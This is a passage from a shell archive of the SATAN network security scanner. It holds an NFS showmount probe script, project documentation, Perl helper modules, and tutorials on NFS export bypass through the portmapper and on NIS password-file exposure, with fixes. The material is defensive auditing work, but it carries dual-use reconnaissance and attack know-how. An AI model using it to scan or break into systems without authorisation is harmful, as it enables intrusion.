Xrequire "perl/fix_hostname.pl";
X
Xif ($#ARGV != 0) {
X print "Usage $0 target\n";
X exit(1);
X }
X
X$target = $ARGV[0];
X($service = $0) =~ s@^.*/([^\/\.]*)\..*$@$1@;
X
X#
X# we don't make value judgements here
X#
X
X$severity = "x";
X$service_output = "";
X
X# Showmount -e tells us who can mount what from this server.
X
Xopen(SM, "$SHOWMOUNT -e $target|");
X
Xwhile (<SM>) {
X chop;
X next unless /^(\S+)\s+(\S+)\s*$/;
X $files = $1;
X @hosts = split(",", $2);
X for $host (@hosts) {
X $Host = $host;
X $host =~ tr/A-Z/a-z/;
X if ($host eq "$everyone$" || $Host eq "Everyone") {
X next if $untrusted_host;
X $status="a";
X $trustee="$files\@$target";
X $trusted="root\@ANY";
X $service_output="unrestricted NFS export";
X $text="exports $files to everyone";
X }
X else {
X $fqdn = &fix_hostname($host ,$target);
X # if the host doesn't really exist, it could
X # be a netgroup or something... try to complete
X # hostname if not FQDN, etc., then try to resolve.
X # If everything fails, just output what we can:
X if ($fqdn eq "") {
X $status="u";
X $trustee="$files\@$target";
X $trusted="root\@$host";
X $service_output="$target $host";
X $text="exports $files to $host, but we can't verify that $host exists";
X }
X else {
X $host = $fqdn;
X $status="a";
X $trustee="$files\@$target";
X $trusted="root\@$host";
X $service_output="$target $host";
X $text="exports $files to $host";
X }
X }
X &satan_print();
X $print_flag = 1;
X }
X }
X
X# Showmount -a tells what systems actually mount from this server.
X
Xopen(SM, "$SHOWMOUNT -a $target|");
X
Xwhile (<SM>) {
X chop;
X next unless /(\S+):(\S+)/;
X ($host = $1) =~ tr/A-Z/a-z/;
X $path = $2;
X $fqdn = &fix_hostname($host ,$target);
X # If everything fails, just output what we can:
X if ($fqdn eq "") {
X $status="u";
X $trustee="$path\@$target";
X $trusted="root\@$host";
X $service_output="$target $host";
X $text="$host mounts $path from $target, but we can't verify that $host exists";
X } else {
X $host = $fqdn;
X $status="a";
X $trustee="$path\@$target";
X $trusted="root\@$host";
X $service_output="$target $host";
X $text="$host mounts $path from $target";
X }
X &satan_print();
X $print_flag = 1;
X}
X
X# print something out if nothing has happened so far...
Xif (!$print_flag) {
X $status="a";
X $severity="";
X $text="Not running showmount or other error";
X &satan_print();
X}
END_OF_FILE
if test 2627 -ne `wc -c <'satan-1.1.1/bin/showmount.satan'`; then
echo shar: \"'satan-1.1.1/bin/showmount.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/showmount.satan'
# end of 'satan-1.1.1/bin/showmount.satan'
fi
if test -f 'satan-1.1.1/html/docs/acknowledgements.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/acknowledgements.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/acknowledgements.html'\" $2445 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/acknowledgements.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Acknowledgements</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H2>Acknowledgements</H2>
X<HR>
XAcknowledgements and Dedications
X<P>
XWe'd like to thank Larry Wall for PERL and the WWW folks for their great
Xsoftware that we hammered into our user interface. Many thanks go to
XNeil Gaiman for supplying us with original artwork for the project.
X<p>
XDan thanks Muffy for her faith in SATAN (that does sound a bit odd)
Xand for the inspiring name.
X<p>
XLast, but not least, our wonderful beta testers and general help-givers
Xand such, with their affiliations (In alphabetical order)
X<UL>
X<LI>Eric Allman, University of California at Berkeley
X<LI>Australian Computer Emergency Response Team (AUSCERT)
X<LI>Walter Belgers, Philips Communications and Processing Services
X<LI>Steve Bellovin, Bell Laboratories
X<LI>Terry Bernstein, SRI
X<LI>Mike Blakele, PC Week
X<LI>Bill Cheswick, Bell Laboratories
X<LI>Computer Emergency Response Team (CERT)
X<LI>Computer Incident Advisory Capability (CIAC)
X<LI>Lionel Cons, CERN
X<LI>Rich R Cower, Intel Incorporated
X<LI>Kay Dekker, University of Coventry
X<LI>Sean Doran, Sprint
X<LI>Dale Drew, MCI
X<LI>Stephen Hansen, Stanford University
X<LI>LaMont Jones, HP
X<LI>Chris LaFournaise, Sequent Computer Systems, Inc.
X<LI>John Larson, Xerox Parc
X<LI>Eliot Lear, Silicon Graphics, Inc.
X<LI>William LeFebvre, Gene Rackow, Argonne National Laboratories
X<LI>Jason Martin Levitt
X<LI>Wolfgang Ley, DFN-CERT
X<LI>John Matzka, Sequent Computer Systems, Inc.
X<LI>DaVe McComb, Goldman Sachs
X<LI>Dan Mosedale, Netscape Communications Corporation
X<LI>Alec Muffett, Sun Microsystems
X<LI>Teun Nijssen, CERT-NL
X<LI>Personnel of the Purdue COAST Laboratory, and the graduate intrusion
Xdetection class: Taimur Aslam, Mark Crosbie, Bryn Dole, Ivan Krsul,
XSandeep Kumar, Steve Lodin, Christoph Schuba, Mihai Sirbu and Gene
XSpafford
X<LI>Personnel of the University of Oslo:
XAnders Odberg, Knut Borge, Morten Hanshaugen, Olav Kolbu
X<LI>Jeff Polk, BSDI
X<LI>Brad Powell, Sun Microsystems
X<LI>Marcus J. Ranum, Trusted Information Systems
X<LI>Brian Reid, DEC
X<LI>Steve Romig, Ohio State University
X<LI>Shabbir Safdar, Goldman Sachs
X<LI>Jeff Sedayao, Intel Corporation
X<LI>David HM Spector, J.P. Morgan
X<LI>Kevin Steves, HP
X<LI>Peter Shipley
X<LI>Eamonn Sullivan, PC Week
X<LI>Lloyd Taylor
X<LI>Nicholas R Trio, IBM
X<LI>Cheryl Trooskin
X<LI>Mark Verber, Xerox Parc
X<LI>Steve Whitlock, Boeing
X</UL>

X</BODY>
X</HTML>
END_OF_FILE

if test 2445 -ne `wc -c <'satan-1.1.1/html/docs/acknowledgements.html'`; then
echo shar: \"'satan-1.1.1/html/docs/acknowledgements.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/acknowledgements.html'
fi
if test -f 'satan-1.1.1/html/docs/design.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/design.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/design.html'\" $2748 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/design.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Design Goals</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Design Goals</H1>
X<HR>
X<P>
XSATAN was not built to solve any single problem; rather, it was built as
Xa research tool, to see what would happen if freely available state of the
Xart software tools were merged with as much security knowledge as we could
Xpool together were crammed into one (at least semi-)cohesive package.
XOur design goals were:
X<UL>
X<LI>Discover if the problem of mapping out the security of large networks
Xwas a solvable problem.
X
X<LI>Use the traditional Unix toolbox approach of program design.
X
X<LI>Use as many freely available software tools that were currently
Xuseful and available, to cut down development time to a minimum.
X
X<LI>Design a security package that was educational as well as useful.
X
X<LI>Create a tool that was freely available to anyone who wanted to use it.
X
X<LI>Discover and uncover as much security and network information as
Xpossible without being destructive.
X
X<LI>Create the best (and, at the creation/development stages, quite nearly the
Xonly) investigative security network tool available, at any price.
X
X<LI>Spur further program development (commercial or academic) in this very
Xrich area.
X
X<LI>Show just how insecure the Internet really is, and how much every
Xsite depends on a large number of potentially insecure other sites.
X</UL>
X<P>
X<A NAME="toolkit"><H3>Toolkit approach</H3></A>
XIt would be impossible to write all of the functionality necessary to
Xmake SATAN work, with only two (very!) part-time programmers. We
Xdecided from the start to steal as much information, tools, and
Xmethodologies (we have no shame!) as possible to create SATAN. In
Xparticular, using perl and the HTML interface were vital to the
Xcompletion of the package. It would be wonderful if we could have a
Xmapping program to graphically display the results, but we haven't found
Xanything suitable so far.
X<P>
X<A NAME="speed-optimization"><H3>Speed/optimization</H3></A>
XOptimizing SATAN for speed of execution was not much of a design
Xconsideration. It was designed to be an information gathering tool
Xthat would be run periodically; a fairly large network (say, a
Xthousand nodes) can be scanned in several hours. In all likelihood, the
Xmajority of time consumed when using SATAN will be deciding on what
Xactions to take based on the results that were found. In any case, the
Xnetwork timeouts and uncertainties make real optimization very
Xdifficult. Fortunately, perl was fast enough (thanks, Larry!) to make
Xperformance a non-issue for most network queries and work.

X
X<hr>
X<a href="satan_overview.html"> Back to the Introductory TOC/Index</a>

X</BODY>
X</HTML>
END_OF_FILE

if test 2748 -ne `wc -c <'satan-1.1.1/html/docs/design.html'`; then
echo shar: \"'satan-1.1.1/html/docs/design.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/design.html'
fi
if test -f 'satan-1.1.1/html/docs/philosophy.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/philosophy.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/philosophy.html'\" $2733 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/philosophy.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Philosophical Musings</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Philosophical Musings</H1>
X<HR>
X<A NAME="why-build"><H3>Why build it?</H3></A>
XWhy did we create SATAN? Quite simply, we wanted to know more about
Xnetwork security, particularly with respect to large networks. There
Xis an enormous amount of information out there, and it is definitely not
Xclear by examining information and hosts by hand what the <I>real</I>
Xoverall security picture is. SATAN was an attempt to break new ground,
Xto promote understanding, and to have fun writing such a program.
X<p>
X<A NAME="money"></a>
X<H3>Money, endorsements, recording contracts, etc.</H3>
X<p>
XFor the record, no one gave us any money to build the tool; the development
Xwas done on our own time and equipment. No one (including our current
Xemployers) endorses or directly supports it.
X<p>
X
X<A NAME="why-scan"><H3>Why does it scan sites other than your own?</H3></A>
XAll the hosts scanned with SATAN are done so because it gives a clearer
Xpicture of what the network security of your site is, by examining the
Xwebs of trust and the possible avenues of approach or attack. Since there is
Xno way that SATAN could, a priori, know where it is going to scan, we
Xdecided that instead of placing artificial constraints on the program, we
Xwould allow the system administrator to place their own constraints on
Xwhere SATAN would run, via the configuration file
X(<A HREF="satan.cf.html#exceptions"> targeting exceptions</A>.)
X
X<p>
X<A NAME="white-hats"><H3>Why wasn't there a limited distribution, to only the "white hats"?</H3></A>
XHistory has shown that attempts to limit distribution of most security
Xinformation and tools has only made things worse. The "undesirable"
Xelements of the computer world will obtain them no matter what you do,
Xand people that have legitimate needs for the information are denied it
Xbecause of the inherently arbitrary and unfair limitations that are set up
Xwhen restricting access.
X
X<p>
X<A NAME="future"><H3>Future directions</H3></A>
XWe're almost certainly going to continue development on SATAN. At the
Xtop of our wish list is a way to graphically display the network maps,
Xespecially with respect to the webs of trust. This is a hard problem!
XOur main goal right now is to get a solid product out, and see how it's
Xreceived by the world; the response will drive our development. In
Xaddition, we haven't had much of a chance to play with the program
Xourselves, so once the dust clears, we'll probably have a better view of
Xwhere we'll take the program.

X
X<hr>
X<a href="satan_overview.html"> Back to the Introductory TOC/Index</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 2733 -ne `wc -c <'satan-1.1.1/html/docs/philosophy.html'`; then
echo shar: \"'satan-1.1.1/html/docs/philosophy.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/philosophy.html'
fi
if test -f 'satan-1.1.1/html/docs/satan_reference.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/satan_reference.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/satan_reference.html'\" $2823 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/satan_reference.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title> SATAN Reference </title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]"> SATAN Reference </H1>

X<H2>(Security Administrator Tool for Analyzing Networks)</H2>
X<HR>
X
X<OL>

X<p>
X<LI><A HREF="the_main_parts.html"><STRONG>SATAN Architecture</STRONG></A>
X<OL>
X<LI><A HREF="the_main_parts.html#general">Architecture overview</A>
X<LI><A HREF="the_main_parts.html#crypto-ignition">Magic cookie generator</A>
X<LI><A HREF="the_main_parts.html#policy-engine">Policy engine</A>
X<LI><A HREF="the_main_parts.html#proximity-levels">Proximity levels</A>
X<LI><A HREF="the_main_parts.html#target-acquisition">Target acquisition</A>
X<LI><A HREF="the_main_parts.html#subnet-scan">Subnet scan</A>
X<LI><A HREF="the_main_parts.html#data-acquisition">Data acquisition</A>
X<LI><A HREF="the_main_parts.html#scanning-levels">Scanning levels</A>
X<LI><A HREF="the_main_parts.html#inference-engine">Inference engine</A>
X<LI><A HREF="the_main_parts.html#report-analysis">Reporting and Analysis</A>

X</OL>
X
X<p>

X<LI><A HREF="user_interface.html"><STRONG>The SATAN User Interface</STRONG></A>
X<OL>
X<LI><A HREF="user_interface.html#basics">The Basics</A>
X<LI><A HREF="user_interface.html#gathering-data">Gathering Data</A>
X<LI><A HREF="user_interface.html#data-mgmt">Data Management</A>
X<LI><A HREF="user_interface.html#looking">Looking at and understanding the results</A>
X<LI><A HREF="user_interface.html#tricky-implications">Hints, Further tricky security implications, or Getting The Big Picture (tm)</A>
X<LI><A HREF="user_interface.html#command-line">The Command-line Interface</A>

X</OL>
X
X<p>

X<LI><A HREF="satan.cf.html"><strong>The most important file of all -
Xsatan.cf</strong></A>
X
X<p>
X<LI><A HREF="satan.db.html"><strong>The SATAN database record
Xformat</strong></A>
X<OL>
X<LI><A HREF="satan.db.html#facts"><strong>facts</strong> - just the facts, m'am</A>
X<LI><A HREF="satan.db.html#all-hosts"><strong>all-hosts</strong> - all the hosts seen</A>
X<LI><A HREF="satan.db.html#todo"><strong>todo</strong> - all the things it did</a>

X</OL>
X
X<p>

X<LI><A HREF="satan.rules.html"><strong>SATAN Rulesets - what makes
XSATAN Go</strong></A>
X<OL>
X<LI><A HREF="satan.rules.html#drop">Overriding/dropping SATAN data</A>
X<LI><A HREF="satan.rules.html#facts">Generating new facts</A>
X<LI><A HREF="satan.rules.html#hosttype">Ascertaining host types</A>
X<LI><A HREF="satan.rules.html#services">Determining network services</A>
X<LI><A HREF="satan.rules.html#todo">Creating internal task lists</A>
X<LI><A HREF="satan.rules.html#trust">Trust relation classification</A>
X</OL>
X<p>
X<LI><A HREF="satan.probes.html"><strong>Adding your own probes and
Xvulnerabilities</strong></A>

X</OL>
X
X<p>
X<hr>
X<a href="../satan_documentation.html"> Back to the Documentation TOC</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 2823 -ne `wc -c <'satan-1.1.1/html/docs/satan_reference.html'`; then
echo shar: \"'satan-1.1.1/html/docs/satan_reference.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/satan_reference.html'
fi
if test -f 'satan-1.1.1/html/docs/trust.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/trust.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/trust.html'\" $2805 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/trust.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>TRUST</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Trust</H1>
X<HR>
X
XTrust is one of the most, if not the most, important concepts in SATAN.
XThe issues and implications of trust are a bit more subtle and

Xfar-reaching than what we've covered before; in the context of this

Xdocumentation we use the word trust whenever there is a situation when a
Xserver (note that any host that allows any remote access can be called a
Xserver) can have a local resource either used or compromised by a client
Xwith or without the proper authorization. In addition, trust is
Xtransitive; e.g. if host <i>B</i> trusts host <i>A</i>, and an intruder
Xcan compromise host <i>A</i>, then the intruder can also compromise
Xhost <i>B</i>.
X
X<p>

X
XThere are many ways that a host can trust: .rhosts and hosts.equiv files

Xthat allow access without password verification are the most common, but
Xother examples are window servers that allow remote systems to use and
Xabuse privileges; export files that control access via NFS, etc.
XHowever (and this is the most controversial statement about trust), we
Xalso say that if a host has had <strong>login</strong> accesses from
Xanother host, that the former host trusts the latter. The reason for
Xthis is that unless extra authentication is being used, if a user logs
Xin from a compromised remote host then the attacker can steal the
Xpassword and data streams from the legitimate user and can almost
Xcompromise the host in question.
X
X<p>

X
XAlthough the concept of how host trust works is well understood by most

Xsystem administrators, the <strong>dangers</strong> of trust, and the
X<strong>practical</strong> problem it represents, irrespective of
Xtrickier attacks such as hostname impersonation and IP spoofing, is one
Xof the least understood problems we know of on the Internet. This goes
Xfar beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing

Xsystems -- indeed, much of the useful services in UNIX are based on the
Xconcept that well known (to an administrator or user) sites are trusted
Xin some way. What is not understood is how networking so tightly binds
Xsecurity between what are normally considered disjoint hosts.
X

X<p>
X
X<strong>Any</strong> form of trust can be spoofed, fooled, or subverted,
Xespecially when the authority that gets queried to check the credentials
Xof the client is either outside of the server's administrative domain,
Xwhen the trust mechanism is based on something that has a weak form of
Xauthentication, or if the security of the other system involved is
Xoutside of the direct control of the system administrator. One or more
Xof these are usually true.

X<hr>
X<a href="satan_overview.html"> Back to the Introductory TOC/Index</a>

X</BODY>
X</HTML>
END_OF_FILE

if test 2805 -ne `wc -c <'satan-1.1.1/html/docs/trust.html'`; then
echo shar: \"'satan-1.1.1/html/docs/trust.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/trust.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/NFS_export_via_portmapper.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/NFS_export_via_portmapper.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/NFS_export_via_portmapper.html'\" $2480 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/NFS_export_via_portmapper.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - Portmapper exports</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif">Portmapper exports</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XNFS file exports via the portmapper.

X
X<H3>Impact</H3>
X

XNFS export restrictions can be bypassed.

X
X<H3>Background</H3>
X

XIn order to perform operations via the NFS network file system
Xprotocol, a client host sends NFS requests to the NFS server daemon
Xwith:
X
X<ul>
X
X<li>an NFS file handle that specifies the target of the operation,
X
X<li>the operation (lookup, read, write, change permissions),
X
X<li>the user on whose behalf the request is sent.
X
X</ul>
X
XWhen an NFS client host wants to access a remote file system for the
Xfirst time, it first needs to obtain an NFS file handle. To this end,
Xthe client host sends an mount request to the server's mount
Xdaemon. The server's mount daemon verifies that the client host has
Xpermission to access the requested file system. When the mount daemon
Xgrants access, it sends a (directory) file handle back to the NFS
Xclient.

X
X<H3>The problem</H3>
X

XFor efficiency reasons, most NFS export restrictions are enforced by
Xthe mount daemon. Individual file access operations are handled by the
XNFS daemon, and the origin of such requests is examined only in
Xspecial cases such as remote superuser access.
X
X<p>
X
XInstead of talking directly to the mount daemon, a malicious NFS
Xclient can ask the server's portmapper daemon to forward the request to
Xthe mount daemon. When the mount daemon receives the request from
Xthe portmapper, the mount daemon will believe that the request comes
Xfrom the file server, and not from the malicious client.
X
X<p>
X
XWhen the file server exports file systems to itself (for example,
Xbecause the server is a netgroup member) the mount daemon grants access
Xand replies with a file handle. The portmapper forwards the handle to
Xthe malicious client. From now on, the client can talk directly to the
Xserver's NFS daemon to access the directory and all files below it.

X
X<H3>Fix</H3>
X

XRun a portmapper (or rpcbind program in case of System V.4) that does
Xnot forward mount etc. requests. Consult your vendor's patch list.
XSee also:
X<a href="ftp://ftp.cert.org/pub/cert_advisories/CA-94:15.NFS.Vulnerabilities">
XCert Advisory 94:15</a>.

X
X<H3>Other tips</H3>
X
X<ul>
X

X<li>Export file systems read-only where possible.
X

X<li>Consider blocking ports 2049 (nfs) and 111 (portmap) on your
Xrouters.
X
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 2480 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/NFS_export_via_portmapper.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/NFS_export_via_portmapper.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/NFS_export_via_portmapper.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/NIS_password_file_access.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/NIS_password_file_access.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/NIS_password_file_access.html'\" $2536 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/NIS_password_file_access.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - NIS password file access</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif">NIS password file access</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XNIS password file access by arbitrary hosts.

X
X<H3>Impact</H3>
X

XAllows automated password guessing attacks.

X
X<H3>Background</H3>
X

XThe NIS (Network Information Service) implements network-wide access to
Xadministrative information. Examples of databases (also called NIS maps)
Xthat are shared via NIS:
X
X<ul>
X
X<li>the password file that describes what users have access to the system,
X
X<li>the table with names and addresses of hosts on the network,
X
X<li>electronic mail aliases.
X
X</ul>
X
XNIS databases are organized in domains. One NIS server can serve
Xmultiple NIS domains. In order to perform a query, a client sends a
Xrequest to a NIS server and specifies
X
X<ul>
X
X<li>a NIS domain name,
X
X<li>the name of the database (NIS map) to be searched,
X
X<li>a search key.
X
X</ul>
X

X<H3>The problem</H3>
X

XMany NIS implementations provide no access control. Every host that
Xasks for information will receive a reply. In order to perform a query,
Xone needs to know the server's NIS domain name. Often, this name is
Xeasy to guess, or it can be obtained via the <em>bootparam</em>
Xnetwork service.
X
X<p>
X
XWhen the local network is accessible from other networks, a remote
Xintruder can collect password file information and run a password
Xguessing program. Many people (including
X<a href="ftp://coast.cs.purdue.edu/pub/doc/passwords/Dan_Klein_password.ps.Z">
XDan Klein</a>) have demonstrated that people tend to choose passwords that
Xare easy to guess.

X
X<H3>Fix</H3>
X

X<ul>
X
X<li>Several vendors have added access control to their <em> ypserv</em>
Ximplementation. Check your system documentation or vendor patch
Xlist. The control file is sometimes called <em>securenets</em>.
X
X</ul>
X
X<H3>Workarounds</H3>
X
X<ul>
X
X<li>Run a <a href="ftp://ftp.win.tue.nl/pub/security/index.html">portmapper
X</a>with access control.
X
X</ul>
X

X<H3>Other tips</H3>
X
X<ul>
X

X<li>Consider blocking ports 111 (portmap) on your network gateway.
XThis makes attacks on NIS and NFS mount daemons much harder.
X
X<li>Enforce a policy for choosing passwords by installing an
Xalternative <em>passwd</em> command, for example
X<a href="ftp://coast.cs.purdue.edu/pub/tools/unix/anlpasswd">anlpasswd</a>.
X
X<li>See the
X<a href="../../docs/admin_guide_to_cracking.html#nis-passwords">Admin
XGuide to Cracking</a> for an example of why this is a problem.
X
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 2536 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/NIS_password_file_access.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/NIS_password_file_access.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/NIS_password_file_access.html'
fi
if test -f 'satan-1.1.1/perl/domains.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/domains.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/domains.pl'\" $2392 characters$
sed "s/^X//" >'satan-1.1.1/perl/domains.pl' <<'END_OF_FILE'
X#
X# sift by domains

X#
X# Output to:
X#

X# $all_domains{domain}: hosts in this domain
X#
X# host_domain{host}: the domain of this host
X#
X# $domain_count{domain}: number of hosts in this domain
X#
X# $domain_severities{domain}: nr of vulnerable hosts in domain
X#
X# $domain_flag: reset whenever the tables are updated. To recalculate,
X# invoke make_domain_info().
X#
X# Standalone usage: perl domains.pl [data directory]
X#
X
X#
X# Generate domain statistics.
X#
Xsub make_domain_info {
X local($domain, $host);
X
X if ($domain_flag > 0) {
X return;
X }
X $domain_flag = time();
X
X print "Rebuild domain type statistics...\n" if $debug;
X
X %all_domains = ();

X for $host (keys %all_hosts) {

X if ($host =~ /^[\[\]0-9.]+$/) {
X $domain = "unknown";
X } else {
X ($domain = $host) =~ s/^[^.]+\.//;
X }
X $all_domains{$domain} .= "$host ";
X $host_domain{$host} = $domain;
X }
X
X # Cheat, in case the facts file has names not in all-hosts.
X
X for $host (keys %hosttype, keys %severity_host_count) {
X if ($host =~ /^[0-9.]+$/) {
X $domain = "unknown";
X } else {
X ($domain = $host) =~ s/^[^.]+\.//;
X }
X if (!exists($host_domain{$host})) {
X $all_domains{$domain} .= "$host ";
X $host_domain{$host} = $domain;
X }
X }
X
X for $domain (keys %all_domains) {
X $domain_count{$domain} = split(/\s+/, $all_domains{$domain});
X $domain_severities{$domain} = 0;
X for $host (split(/\s+/, $all_domains{$domain})) {
X $domain_severities{$domain}++ if exists($severity_host_type_info{$host});
X }
X }
X}
X
X#
X# erase the domain info tables
X#
Xsub clear_domain_info {
X %all_domains = ();
X %host_domain = ();
X %domain_count = ();
X %domain_severities = ();
X $domain_flag = 0;
X}
X
X#
X# Stand-alone mode
X#
Xif ($running_under_satan == 0) {
X warn "domains.pl in stand-alone mode...";
X $running_under_satan = 1;
X $debug = 1;
X require 'perl/targets.pl';
X require 'perl/severities.pl';
X require 'perl/facts.pl';
X
X &read_all_hosts("$ARGV[0]/all-hosts");
X &read_facts("$ARGV[0]/facts");
X &make_domain_info();
X &make_hosttype_info();
X
X print "Missing domain info\n";
X
X for (keys %hosttype) {
X print "\t$_\n" if !exists($host_domain{$_});
X }
X
X print "\nDomain info\n";
X
X for (keys %all_domains) {
X print "Domain: $_ $domain_severities{$_}/$domain_count{$_}\n";
X for (split(/\s/, $all_domains{$_})) {
X print "\t$_\n";

X }
X }
X}
X
X1;
END_OF_FILE

if test 2392 -ne `wc -c <'satan-1.1.1/perl/domains.pl'`; then
echo shar: \"'satan-1.1.1/perl/domains.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/domains.pl'
fi
if test -f 'satan-1.1.1/perl/infer_todo.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/infer_todo.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/infer_todo.pl'\" $2418 characters$
sed "s/^X//" >'satan-1.1.1/perl/infer_todo.pl' <<'END_OF_FILE'
X#
X# Usage: &infer_todo()
X#
X# Applies rules in $infer_todo_files to the global $target..$text
X# variables (and to all other globals that are available) and
X# generates new probes for the data collection engine.
X#
X# Standalone usage: perl infer_todo.pl [satan_record_files...]
X#
X# version 1, Tue Mar 21 20:25:31 1995, last mod by wietse
X#
X
X$infer_todo_files = "rules/todo";
X
Xsub build_infer_todo{
X local($files) = @_;
X local($cond, $todo, $func, $host, $tool, $args, $args1, $args2);
X
X $code = "sub infer_todo {\n";
X $code .= " local(\$junk);\n";

X
X foreach $file (split(/\s+/, $files)) {
X open(RULES, $file) || die "cannot open $file: $!";
X while (<RULES>) {
X chop;
X while (/\\$/) {
X chop;
X $_ .= <RULES>;
X chop;
X }
X s/#.*$//;

X next if /^\s*$/;
X s/@/\\@/g;
X ($cond, $todo) = split(/\t+/, $_, 2);
X ($host, $tool, $args) = split(/\s+/, $todo, 3);
X $host ne "" || die "no host in $file: cond=$cond, todo=$todo\n";
X $tool ne "" || die "no tool in $file: cond=$cond, todo=$todo\n";
X if ($args =~ /\*\s*(.+)/) {
X $func = "add_todo_ignore_args";
X $args = $1;
X } else {
X $func = "add_todo";
X }
X $code .= "\tif ($cond) {\n\t\t&$func($host,$tool";
X ($args ne "") && ($code .= ",$args");
X $code .= ");\n\t}\n";
X }
X close(RULES);
X }
X $code .= "\n}\n";

X return $code;
X}
X
X#

X# Some scaffolding for stand-alone operation
X#
Xif ($running_under_satan) {

X eval &build_infer_todo($infer_todo_files);
X die "error in $infer_todo_files: $@" if $@;

X} else {
X $running_under_satan = -1;
X

X require 'perl/misc.pl';
X require 'perl/fix_hostname.pl';
X

X warn "infer_todo.pl running in test mode";

X
X eval "sub add_todo { local(\$target,\$tool,\$args) = \@_;

X print \"add_todo: \$target \$tool \$args\\n\"; }\n";
X
X eval "sub add_todo_ignore_args { local(\$target,\$tool,\$args) = \@_;
X print \"add_todo_ignore_args: \$target \$tool \$args\\n\"; }\n";
X
X #
X # Build satan rules and include them into the running code.
X #
X $code = &build_infer_todo($infer_todo_files);
X print "Code generated from $infer_todo_files:\n\n";

X print $code;
X eval $code;

X die "error in $infer_todo_files: $@" if $@;

X
X #
X # Apply rules.
X #
X print "\nApplying rules to all SATAN records...\n";
X while (<>) {
X chop;

X if (&satan_split($_)) {
X warn "Ill-formed record: $_\n";
X } else {
X &infer_todo();

X }
X }
X}
X
X1;
END_OF_FILE

if test 2418 -ne `wc -c <'satan-1.1.1/perl/infer_todo.pl'`; then
echo shar: \"'satan-1.1.1/perl/infer_todo.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/infer_todo.pl'
fi
if test -f 'satan-1.1.1/perl/run-satan.pl' -a "${1}" != "-c" ; then
